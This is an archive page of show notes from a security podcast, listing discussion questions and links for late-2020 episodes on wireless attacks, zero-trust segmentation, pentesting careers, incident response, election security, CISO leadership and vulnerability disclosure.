What other kinds of attacks can be launched? (I mean, other than replay type attacks)
Door systems (badge systems)
NFC? Contactless credit card attacks
Smart building/home control systems
Bluetooth attacks
Point Of Sale systems
Cellular radio 3g/4g/5g
Industrial control systems
Home appliances
Medical telemetry systems
Drones!
DASH7 - Wikipedia - custom TCP stack for LoRa
Vehicle-to-grid - Wikipedia (V2G)
Automatic Wireless Protocol Reverse Engineering | USENIX
Hunting mobile devices endpoints - the RF and the Hard way | Synacktiv - Sébastien Dudek
Carrier Aggregation explained (3gpp.org)
Mobile phone jammer - Wikipedia
World’s top hackers meet at the first 5G Cyber Security Hackathon - Security Boulevard
Supply chain attacks - systems tend to use wireless chipsets or protocols
LTE-torpedo-NDSS19.pdf (uiowa.edu) -privacy attacks on 4g/5g networks using side channel information
How does someone make a faraday cage on the cheap? (mentioned in one of your class agendas)
Lots of IoT devices use your typical home wifi connection, can’t you just sniff packets to get what you need?
Replay attacks on car fobs: Jam and Replay Attacks on Vehicular Keyless Entry Systems (s34s0n.github.io)
Attacks on Tesla wireless entry: Tesla’s keyless entry vulnerable to spoofing attack, researchers find - The Verge
Garage door opener attacks: How to Hack a Garage Door in Under 10 Seconds and What You Can Do About It - ITS Tactical
Kid’s toy opens garage doors: This Hacked Kids' Toy Opens Garage Doors in Seconds | WIRED
What are the current limitations to testing wireless and RF related systems? What about custom wireless implementations?
Cellular?
Zigbee?
I’m a wireless manufacturer of some kind of device. I’m freaked now by hearing you talk about how easy it is to attack wireless systems. What are some things I could do to ensure that the types of attacks we discussed here cannot affect me?
Wireless defense system? https://www.researchgate.net/publication/321491751_Security_Mechanisms_to_Defend_against_New_Attacks_on_Software-Defined_Radio
List of SDR software: The BIG List of RTL-SDR Supported Software (rtl-sdr.com)
Published on: November 24, 2020SPONSORED Podcast: Katey Wood from Illumio on deployment and using WIndows Filtering Platform
**Apologies on the Zoom issues**
This is the 2nd of 3 sponsored podcast interviews with Illumio about Their zero trust product.
Katey Wood is the Director of Product Marketing at Illumio.
https://www.linkedin.com/in/kateywood/
Topic: Conversation on segmentation and ransomware
Topic Background:
The attack surface and vulnerabilities are on the rise, along with cyber attacks
Why? Remote everything - cloud collaboration (including processing PII) is the new normal and that means the attack surface is heightened. This requires appropriate network, cloud, and endpoint security.
Double ransom with #data #exfiltration -- more attackers are exfiltrating customer data from businesses and (if ransom is withheld) extorting consumers directly through bitcoin - often in the headlines.
Privacy is a chief security concern now more than ever before, as remote everything continues and #cyberattacks and #ransomware attacks skyrocket.
For businesses, Covid and the new WFH normal means even more vulnerabilities and greater incentive to pay an even higher ransom to avoid privacy law penalties and class-action litigation.
Enter Segmentation.
Perimeter security is important, but unfortunately, we all know that alone it’s not enough (i.e. breach, after breach, after high-profile breach).
#ZeroTrust the assume breach mentality/default deny are philosophies that take security deeper to protect organizations from a threat moving laterally within their environment. This is helpful because it’s often not the initial point of breach that causes so much damage – it’s the breach spreading to more critical data and assets that’s so destructive.
#Network #segmentation is a crucial control to secure critical data and PII, by ring-fencing applications with patient or client data. Implementing Zero Trust security policies limits access to only allowed parties with a legitimate business purpose and stops the attacker from moving freely across the network to the most valuable data.
#Illumio helps #healthcare, academic, and other critical industries keep their crown jewels safe through better, more scalable micro-segmentation that decouples Zero Trust from the constraints of the network by implementing it on the workload.
Vertical ‘Brakedown’ - Healthcare and Education
Businesses in the healthcare and education industry often have large numbers of customers and employees, and handle large volumes of PII, are especially at risk.
Both have already been under scrutiny for privacy concerns around PII for years, through regulations like #HIPAA in healthcare and #FERPA in education (and now #CCPA).
Now that distance learning is the norm and medical records have gone largely electronic, it’s even easier for attackers to move between systems if there are no network segmentation access policies in place to prevent it.
Potential Questions:
Customer data cases:
‘Dead data’
With today’s workforce largely remote, tell me what that means from a security standpoint. What challenges are businesses facing to protect important data/PII?
What is that data “worth” and what are the consequences of falling victim to a ransomware attack or similar event from a bad actor?
Talk to me about the “assume breach mentality.” What does that mean and how can you/why should you use this philosophy in your approach to security?
How does segmentation relate to compliance? How do the two go hand in hand?
How does segmentation protect organizations against large scale breaches?
In terms of cost, is segmentation a sizable investment for SMBs? Is it a worthwhile investment, in terms of dollars saved from ransomware attacks?
#Segmentation is often thought of as a big (perhaps cumbersome) project – how do you suggest organizations make it more scalable?
How does segmentation protect end users?
Published on: November 17, 2020
2020-042-Kim Crawley and Phillip Wylie discuss "Pentester Blueprint", moving into pentesting career
Phillip Wylie @philipwylie
and kim Crawley @kim_crawley
Amazon: The Pentester BluePrint: Your Guide to Being a Pentester: 9781119684305: Computer Science Books @ AmazonSmile November 24th for paper copy
Steven levy: Hackers: Heroes of the Computer Revolution: Steven Levy: 9781449388393: Amazon.com: Books
Why did you write the book?
What is a pentester?
Skills needed
Education of hacker
Building a lab
Kali linux
Pentester Framework
Docker
OWASP Juice Box
Vulnhub
Overthewire
PicoCTF
Developing a plan
Gaining experience
Gaining employmen
Hacking is not Crime - hackivist org? https://www.hackingisnotacrime.org/
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#AmazonMusic: https://brakesec.com/amazonmusic
#Brakesec Store!: https://brakesec.com/teepub
#Spotify: https://brakesec.com/spotifyBDS
#Pandora: https://brakesec.com/pandora
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
#cybersecurity #informationsecurity #leadership #podcasts #CPEs #CISSP
Published on: November 15, 2020
2020-041- Conor Sherman, IR stories, cost of not prepping for an incident
“Between stimulus and response there is a space. In that space is our power to choose our response. In our response lies our growth and our freedom. --Victor Frankl
https://smile.amazon.com/Mans-Search-for-Meaning-audiobook/dp/B0006IU470
https://twitter.com/conordsherman
Conor Sherman - IR stories and more
Security Strategy and Incident Response, eZCater
Confident Defense Podcast - https://www.confidentdefense.com/podcast
https://www.linkedin.com/in/conordsherman/
Agenda:
Bio (How did I get here?)
Prior preparation and planning prevents poor performance - https://military.wikia.org/wiki/7_Ps_(military_adage)
Discover Unique malware
FIN 6 - https://www.zdnet.com/article/cybercrime-group-fin6-evolves-from-pos-malware-to-ransomware/
FIN 7 - https://threatpost.com/fin7-retools/149117/
CCPA - https://oag.ca.gov/privacy/ccpa
CIS 20 is ‘reasonable security program’ per California AG - https://www.prnewswire.com/news-releases/california-attorney-general-concludes-that-failing-to-implement-the-center-for-internet-securitys-cis-critical-security-controls-constitutes-a-lack-of-reasonable-security-300223659.html
IBM breach cost: “Cost Of A data Breach” (Search This)
Cloud Infra Compliance-
Governance as Code - https://www.cio.com/article/3277611/governance-as-code-keeping-pace-with-the-rate-of-change-in-the-cloud.html
“In the future, governance as code will be the backbone driving our IT systems and services. It will enable us to deliver consistent, efficient and highly repeating business outcomes at the lowest possible cost, with the maximum availability and security, while also allowing our people to expand into new and higher value-add roles across business.”
Detection as Code
“Freedom within Limits” - Security as Solutions Engineers
Sigma: https://github.com/Neo23x0/sigma
“Sigma is a generic and open signature format that allows you to describe relevant log events in a straightforward manner. The rule format is very flexible, easy to write and applicable to any type of log file.”
Japan CIRT event ID whitepaper: https://www.jpcert.or.jp/english/pub/sr/DetectingLateralMovementThroughTrackingEventLogs_version2.pdf
https://jpcertcc.github.io/ToolAnalysisResultSheet/
“Shield is an active defense knowledge base MITRE is developing to capture and organize what we are learning about active defense and adversary engagement. Derived from over 10 years of adversary engagement experience, it spans the range from high level, CISO ready considerations of opportunities and objectives, to practitioner friendly discussions of the TTPs available to defenders.”
IR Playbooks -
process of creating them (probably the hardest)
Implementation
Tabletop exercise (length, stakeholders, crafting a scenario to compare against)
What if an org has nothing? “We just blow up the environment and start over."
RTO/RPO metrics: How long can you survive as a company with an outage? How long does it take to get back online and operational? What’s your appetite for the risk of that?
Lots of dependencies to creating
https://swimlane.com/blog/incident-response-playbook
Tabletop discussion -
sponsors involved
Initiating condition
Threat modeling
Process steps
Best practices and local policies
End state - what is the goal? (eradicate infection, back to operating status)
Relation to governance/regulatory reqs. (do we have to report? What do we report? Fallout from incident, etc)
Lessons Learned
https://sbscyber.com/resources/7-steps-to-building-an-incident-response-playbook (seems like there are different methodologies)
Why are the things that will give organizations the biggest benefit over time the cause of the most consternation?
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#AmazonMusic: https://brakesec.com/amazonmusic
#Brakesec Store!: https://brakesec.com/teepub
#Spotify: https://brakesec.com/spotifyBDS
#Pandora: https://brakesec.com/pandora
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
#cybersecurity #informationsecurity #leadership #podcasts #CPEs #CISSP
Published on: November 10, 20202020-040- Jeremy Mio, State of Ohio Election Security
Previous Election Security podcast: https://brakeingsecurity.com/2018-042-election-security-processes-in-the-state-of-ohio
Jeremy Mio (@cyborg00101)
https://itsecurity.cuyahogacounty.us/
(added cybersecurity Directives during 2018 last podcast -jmio)
- Directive 2018-15 (6/21/18) - Cybersecurity
-
- EI-ISAC Membership, DHS Services, IDS (Albert) Monitoring, Elections Infrastructure Security Assessment, Secure Online Services (DDoS Protection), examples via the State: Win10, DB Monderization, MFA, Cloud Email Pilot, IT Support Pilot
- Directive 2018-30 (9/28/18) - Reminder and Additional Clarifications
Einstein (US-CERT program) - Wikipedia
Albert Program
(added new cybersecurity Directives since last podcast -jmio)
- Directive 2019-07 (5/06/19) - Specifics on security event reporting (expansion on 2017 Directive)
- Directive 2019-08 (6/11/19) - Expansion on 2018 and technical guides
-
- Continuing 2018 requirements: EI-ISAC members, phishing tests, vulnerability scanning, continue to secure online systems (TLS/DDoS)
- Remediate all high priority findings from 2018 assessment by 1/31/2020
- Additional technical requirements
- Additional DHS Services requested by 7/19/2019 (mitigate high findings by 1/31/20): Risk and Vulnerability assessment, Remote Pen Test, Arch Design Review, Cyber Threat Hunt
- Others: 2019 TTX, required all to use .US or .GOV domain, Annual assessments and background checks, Technical procurement guide, DMARC
LaRose issues directive to set a new standard for election security in 2020 (added -jmio)
- LaRose Announces Pick For Chief Information Security Officer
- Directive 2020-12 (7/14/20): Additional cybersecurity (and others) requirements by 8/28/2020
-
- Cybersecurity Liaisons
- Extended IDS Albert funding and SIEM Services
- New: EDR and MDBR by 8/28/2020 (and additional push for DMARC)
- Securing Online Services and WAF, and requiring DHS Services Annually
- Vulnerability Management: Critical and High SLA
- Continue Annual cybersecurity training and background checks (including vendor/contractors), Physical Security Training
- Emergency Planning with local EMA and Sheriff
Vuln disclosure policy: Vulnerability Disclosure Policy - Ohio Secretary of State (ohiosos.gov)
Did anyone think to pentest the vuln acceptance form? (lol, layers in layers --brbr)
- 8/11/20: LAROSE ISSUES FIRST IN THE NATION SECRETARY OF STATE VULNERABILITY DISCLOSURE POLICY (added -jmio)
Ohio to ramp up election security with new federal funds | TheHill
“Ohio has taken steps to combat those types of threats. In October, Ohio Gov. Mike DeWine (R) signed into law a measure that required post-election audits to ensure the accuracy of the vote count, and created a “civilian cyber security reserve” to defend against potential cyberattacks.
- Directive 2020-12 - “Cybersecurity Liaisons” (added -jmio)
“His [secretary of state LaRose] first-of-its-kind Vulnerability Disclosure Policy invites Ohio’s crop of “white-hat” hackers — the good guys, opposite malevolent “black-hat” hackers — to break into the state’s election system, find bugs and report them so officials can ensure they’re fixed by Election Day.
There are some strings attached: White hats aren’t allowed to phish for information or tamper with electronic county voter registration systems, and actual voting machines — legally barred from being connected to the internet — are off-limits. If they do find sensitive information, they’re expected to report it.”
How did the threat model shift from the last time we talked?
What has changed in terms of organization and threats? You mentioned 4-5 different voting regions last time, all with different levels of technology. Any updates on the tech?
How did covid change how voting occurred?
How have you leveraged the Elections Infrastructure ISAC (EI-ISAC) in passing along threats and sharing information?
- LAROSE TAKES ACTION IN RESPONSE TO IRANIAN CYBER THREATS (added -jmio)
Has insider threat been part of your threat model and what has your group done to minimize the chances? (why does it feel like the Oscars has more scrutiny in terms of voting security than the US democratic process? --brbr)
What does physical security look like in terms of people going to the polls? (wasn’t sure if that was something in your purview --brbr) (this is not (Election Board and Sheriff), but can discuss high level -jmio)
Using hardware domain block services? Malicious Domain Blocking and Reporting (MDBR) Newest Service for U.S. SLTTs (cisecurity.org)
LaRose Setting New Standard For Election Security - Ohio Secretary of State (ohiosos.gov)
88 election districts will have access to domain blocking tech (mandated to start by 28 August 2020), cybersecurity experts. Can you give us an update on any of what was mentioned in the press release
- “LaRose in recent months has also implemented statewide use of endpoint detection monitoring software and required counties to develop contingency plans for any incident that disrupts the voting process.”
Background checks
Published on: November 2, 20202020-039-Philip Beyer-leadership- making an impact
Phil Beyer -
Bio (CISO at Etsy)
Importance on books about behavioral science.
“Thinking Fast and Slow”:
https://smile.amazon.com/Thinking-Fast-Slow-Daniel-Kahneman/dp/0374533555
“Predictably irrational”: https://smile.amazon.com/Predictably-Irrational-Revised-Expanded-Decisions/dp/0061353248/
http://humanhow.com/list-of-cognitive-biases-with-examples/
Influence: the Psychology of Persuasion: https://smile.amazon.com/Influence-Psychology-Persuasion-Robert-Cialdini/dp/006124189X
Brain at Work: https://smile.amazon.com/Your-Brain-Work-Revised-Updated/dp/0063003155/
Atomic habits: https://smile.amazon.com/Atomic-Habits-Proven-Build-Break/dp/0735211299/
Tiny habits: https://smile.amazon.com/Tiny-Habits-Changes-Change-Everything/dp/0358003326/
New leaders 100 day action plan: https://smile.amazon.com/New-Leaders-100-Day-Action-Plan/dp/1119223237/
Podcasts:
Manager Tools Podcast: https://manager-tools.com
Career Tools Podcast: https://www.manager-tools.com/all-podcasts?field_content_domain_tid=5
Seth Godin Akimbo: https://www.akimbo.link/
Masters of scale: https://mastersofscale.com/
Habit stacking -
Temptation bundling -
Availability Heuristic: https://en.wikipedia.org/wiki/Availability_heuristic
Brian’s Recommendations:
Extremely Popular Delusions and the Madness of Crowds: https://www.amazon.com/Extraordinary-Popular-Delusions-Madness-Crowds/dp/1463740514
Big 9: https://www.amazon.com/Big-Nine-Thinking-Machines-Humanity/dp/154177373X
Bryan’s Book Recommendations:
Malcolm Gladwell’s Talking to Strangers:
https://smile.amazon.com/Talking-to-Strangers-audiobook/dp/B07NJCG1XS
The Effective Manager by Mark Horstman: https://smile.amazon.com/The-Effective-Manager-audiobook/dp/B071JSWHBJ
ADKAR: A Model for Change in Business, Government and our Community
https://smile.amazon.com/ADKAR-Change-Business-Government-Community/dp/1930885504
Improved interviews online
First 90 days as CISO
First 90 day plan: https://www.manager-tools.com/2012/06/90-day-new-job-plan-overview
Capability Assessment: https://www.strategyand.pwc.com/gx/en/unique-solutions/capabilities-driven-strategy/capabilities-assessment.html
Socratic method: https://en.wikipedia.org/wiki/Socratic_method
Impacts to make
Building rapport with new directs
Creating a new relationship ‘budget’ with manager/board, colleagues
Planning your strategy to make meaningful change in the org as a whole
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#AmazonMusic: https://brakesec.com/amazonmusic
#Brakesec Store!: https://brakesec.com/teepub
#Spotify: https://brakesec.com/spotifyBDS
#Pandora: https://brakesec.com/pandora
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
#cybersecurity #informationsecurity #leadership #podcasts #CPEs #CISSP
Published on: October 28, 2020SPONSORED PODCAST: Neil Patel, Illumio on Microsegmentation, and adopting the Zero Trust philosophy
- Spokesperson: Neil Patel (Sr. Technical Marketing Engineer)
- Topic: Zero trust and segmentation market
http://brakeingsecurity.com/2020-023-jame-nelson-from-illumio-cyber-resilence-business-continuity
What is Zero Trust and why should companies adopt a Zero Trust philosophy?
Amanda: What are one of the more important steps someone should take when looking to implement zero trust?
How does segmentation fit in a Zero Trust model? What are some of the challenges and benefits that come with segmentation?
Are there real-world examples of how segmentation has stopped a breach and how that relates to the Zero Trust philosophy?
How can Zero Trust principles help prevent the spread of ransomware or another security epidemic?
Do you need 100% asset mgmt already before implementing or is that part of what you do as well?
Integrations: you mentioned auth functions, but how integrated can Illumio go with your env? EDR? NDR? (saw on your site, you’re fully integrated with Crowdstrike falcon)
Tell us more about the Forrester Wave? What do the findings mean and why do they matter?
https://www.illumio.com/resource-center/research-report/forrester-wave-zero-trust-2020
Twitter: https://twitter.com/illumio
LinkedIn: https://www.linkedin.com/company/illumio/mycompany/
Published on: October 23, 20202020-038-Phil_Beyer-etsy-CISO-leadership-making-an-impact
Phil Beyer -
Bio (CISO at Etsy)
Importance on books about behavioral science.
“Thinking Fast and Slow”:
https://smile.amazon.com/Thinking-Fast-Slow-Daniel-Kahneman/dp/0374533555
“Predictably irrational”: https://smile.amazon.com/Predictably-Irrational-Revised-Expanded-Decisions/dp/0061353248/
http://humanhow.com/list-of-cognitive-biases-with-examples/
Influence: the Psychology of Persuasion: https://smile.amazon.com/Influence-Psychology-Persuasion-Robert-Cialdini/dp/006124189X
Brain at Work: https://smile.amazon.com/Your-Brain-Work-Revised-Updated/dp/0063003155/
Atomic habits: https://smile.amazon.com/Atomic-Habits-Proven-Build-Break/dp/0735211299/
Tiny habits: https://smile.amazon.com/Tiny-Habits-Changes-Change-Everything/dp/0358003326/
New leaders 100 day action plan: https://smile.amazon.com/New-Leaders-100-Day-Action-Plan/dp/1119223237/
Podcasts:
Manager Tools Podcast: https://manager-tools.com
Career Tools Podcast: https://www.manager-tools.com/all-podcasts?field_content_domain_tid=5
Seth Godin Akimbo: https://www.akimbo.link/
Masters of scale: https://mastersofscale.com/
Habit stacking -
Temptation bundling -
Availability Heuristic: https://en.wikipedia.org/wiki/Availability_heuristic
Brian’s Recommendations:
Extremely Popular Delusions and the Madness of Crowds: https://www.amazon.com/Extraordinary-Popular-Delusions-Madness-Crowds/dp/1463740514
Big 9: https://www.amazon.com/Big-Nine-Thinking-Machines-Humanity/dp/154177373X
Bryan’s Book Recommendations:
Malcolm Gladwell’s Talking to Strangers:
https://smile.amazon.com/Talking-to-Strangers-audiobook/dp/B07NJCG1XS
The Effective Manager by Mark Horstman: https://smile.amazon.com/The-Effective-Manager-audiobook/dp/B071JSWHBJ
ADKAR: A Model for Change in Business, Government and our Community
https://smile.amazon.com/ADKAR-Change-Business-Government-Community/dp/1930885504
Improved interviews online
First 90 days as CISO
First 90 day plan: https://www.manager-tools.com/2012/06/90-day-new-job-plan-overview
Capability Assessment: https://www.strategyand.pwc.com/gx/en/unique-solutions/capabilities-driven-strategy/capabilities-assessment.html
Socratic method: https://en.wikipedia.org/wiki/Socratic_method
Impacts to make
Building rapport with new directs
Creating a new relationship ‘budget’ with manager/board, colleagues
Planning your strategy to make meaningful change in the org as a whole
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#AmazonMusic: https://brakesec.com/amazonmusic
#Brakesec Store!: https://brakesec.com/teepub
#Spotify: https://brakesec.com/spotifyBDS
#Pandora: https://brakesec.com/pandora
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
#cybersecurity #informationsecurity #leadership #podcasts #CPEs #CISSP
Published on: October 20, 20202020-037-Katie Moussouris, Implementing VCMM, diversity in job descriptions - Part 2
Introduce Katie (bio) (@k8em0) CEO and Owner, LutaSecurity
The scope of the VCMM (what is it?)
VCMM - Vulnerability Coordination Maturity Model
https://www.lutasecurity.com/vcmm
Just covers the internal process? To ready an org for a bug bounty program or to accept vulns from security researchers?
You mentioned not playing whack-a-mole, when it comes to responding at the beginning of a vuln disclosure program. Is the directing of different categories of bugs one of the things that goes into not having to just wait for the bugs to roll in?
Will this work for internal security or red teams as well, or is this more suited to bug bounties?
What’s the timeline for this process? “We need something for a product launch next week…”
Stakeholders involved? CISO? Security team? IT? Devs?
What precipitates the need for this? Maturity? Vuln Disclosure?
Are the ISO docs required for this to work, or will they assist in an easier outcome?
https://blog.rapid7.com/2017/12/19/nist-cyber-framework-revised-to-include-coordinated-vuln-disclosure-processes/
10 worst jobs (popsci article): https://web.archive.org/web/20070712070214/https://www.popsci.com/popsci/science/0203101256a23110vgnvcm1000004eecbccdrcrd.html
How does an org use this to communicate vulnerabilities in their own products?
What’s the bare minimum you need on this chart for a successful program? Are any facets more important than the others? Does anyone hit all 3s, or is that a pipedream?
Incentive “no legal action will be taken”. People want money… not tours, not 10-point font. How do you convince ‘good’ bug writers to want to help you for a ‘thank you’? Should incentive be a ‘Level 3’ or would you consider it not ready for prime-time?
https://www.zdnet.com/article/yahoo-changes-bug-bounty-policy-following-t-shirt-gate/
Vuln reporting
Lots of Twitter fodder of companies that handle vuln disclosure poorly, even folks say that you shouldn’t bother and deal with a 3rd party.
If a company is taking bugs and doing all the baseline items, what are some other things they could do to make security disclosure easier?
Security.txt?
Clearly stated bugs@ or Security@ (and not buried in 3 point font in the privacy policy, or ToS)
SLA to reply to all bugs?
Standardized disclosure form for discoveries?
Slide Presentation Overview: https://7bb97855-c50f-4dce-9a1c-325268684c64.filesusr.com/ugd/ed9b4b_f04d16446542494887906777a39204bf.pdf
ISO 29147:2018 - $150 USD
https://www.iso.org/standard/72311.html
ISO 30111:2019 - $95 USD
https://www.iso.org/standard/69725.html
ISO 27034-7:2018 - $150 USD
https://www.iso.org/standard/66229.html
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#AmazonMusic: https://brakesec.com/amazonmusic
#Brakesec Store!: https://brakesec.com/teepub
#Spotify: https://brakesec.com/spotifyBDS
#Pandora: https://brakesec.com/pandora
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: October 11, 20202020-036-Katie Moussouris, Vulnerability Coordination Maturity Model, when are you ready for a bug bounty - Part 1
Introduce Katie (bio) (@k8em0) CEO and Owner, LutaSecurity
The scope of the VCMM (what is it?)
VCMM - Vulnerability Coordination Maturity Model
https://www.lutasecurity.com/vcmm
Just covers the internal process? To ready an org for a bug bounty program or to accept vulns from security researchers?
You mentioned not playing whack-a-mole, when it comes to responding at the beginning of a vuln disclosure program. Is the directing of different categories of bugs one of the things that goes into not having to just wait for the bugs to roll in?
Will this work for internal security or red teams as well, or is this more suited to bug bounties?
What’s the timeline for this process? “We need something for a product launch next week…”
Stakeholders involved? CISO? Security team? IT? Devs?
What precipitates the need for this? Maturity? Vuln Disclosure?
Are the ISO docs required for this to work, or will they assist in an easier outcome?
https://blog.rapid7.com/2017/12/19/nist-cyber-framework-revised-to-include-coordinated-vuln-disclosure-processes/
10 worst jobs (popsci article): https://web.archive.org/web/20070712070214/https://www.popsci.com/popsci/science/0203101256a23110vgnvcm1000004eecbccdrcrd.html
How does an org use this to communicate vulnerabilities in their own products?
What’s the bare minimum you need on this chart for a successful program? Are any facets more important than the others? Does anyone hit all 3s, or is that a pipedream?
Incentive “no legal action will be taken”. People want money… not tours, not 10-point font. How do you convince ‘good’ bug writers to want to help you for a ‘thank you’? Should incentive be a ‘Level 3’ or would you consider it not ready for prime-time?
https://www.zdnet.com/article/yahoo-changes-bug-bounty-policy-following-t-shirt-gate/
Vuln reporting
Lots of Twitter fodder of companies that handle vuln disclosure poorly, even folks say that you shouldn’t bother and deal with a 3rd party.
If a company is taking bugs and doing all the baseline items, what are some other things they could do to make security disclosure easier?
Security.txt?
Clearly stated bugs@ or Security@ (and not buried in 3 point font in the privacy policy, or ToS)
SLA to reply to all bugs?
Standardized disclosure form for discoveries?
Slide Presentation Overview: https://7bb97855-c50f-4dce-9a1c-325268684c64.filesusr.com/ugd/ed9b4b_f04d16446542494887906777a39204bf.pdf
ISO 29147:2018 - $150 USD
https://www.iso.org/standard/72311.html
ISO 30111:2019 - $95 USD
https://www.iso.org/standard/69725.html
ISO 27034-7:2018 - $150 USD
https://www.iso.org/standard/66229.html
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#AmazonMusic: https://brakesec.com/amazonmusic
#Brakesec Store!: https://brakesec.com/teepub
#Spotify: https://brakesec.com/spotifyBDS
#Pandora: https://brakesec.com/pandora
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: October 6, 20202020-035-ransomware death in Germany, Zerologon woes, drovorub, and corp data on personal devices
FIND US NOW ON AMAZON MUSIC! https://music.amazon.com/podcasts/51b7da82-c223-4de4-8fc1-d1c3dd61984a/Brakeing-Down-Security-Podcast
Shout to the organizers of Bsides Edmonton, Alberta, Canada for a great conference!
Amanda’s social media take over this week
Bryan's plumbing story (A tale of 3 toilets)
https://www.infosecurity-magazine.com/news/corporate-data-on-personal-devices/
https://www.infosecurity-magazine.com/news/fatality-after-hospital-hacked/
https://fortune.com/2020/09/18/ransomware-police-investigating-hospital-cyber-attack-death/
Zerologon -
https://nakedsecurity.sophos.com/2020/09/17/zerologon-hacking-windows-servers-with-a-bunch-of-zeros/
US govt orders federal agencies to patch dangerous Zerologon bug by Monday, 21 September 11:59 EDT)
Tweet mentioning not needing to reset passwords for access:
https://twitter.com/_dirkjan/status/1307662409436475392
https://twitter.com/MsftSecIntel/status/1308941504707063808?s=20
Linux malware (drovorub)
https://www.tripwire.com/state-of-security/featured/drovorub-malware/
Rampant Kitten‘s arsenal includes Android malware that bypasses 2FA
https://exploit.kitploit.com/2020/09/tp-link-cloud-cameras-ncxxx-bonjour.html
https://www.infosecurity-magazine.com/news/former-pm-passport-phone-hacker/
https://threatpost.com/bluetooth-spoofing-bug-iot-devices/159291/
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#Brakesec Store!:https://www.teepublic.com/user/bdspodcast
#Spotify: https://brakesec.com/spotifyBDS
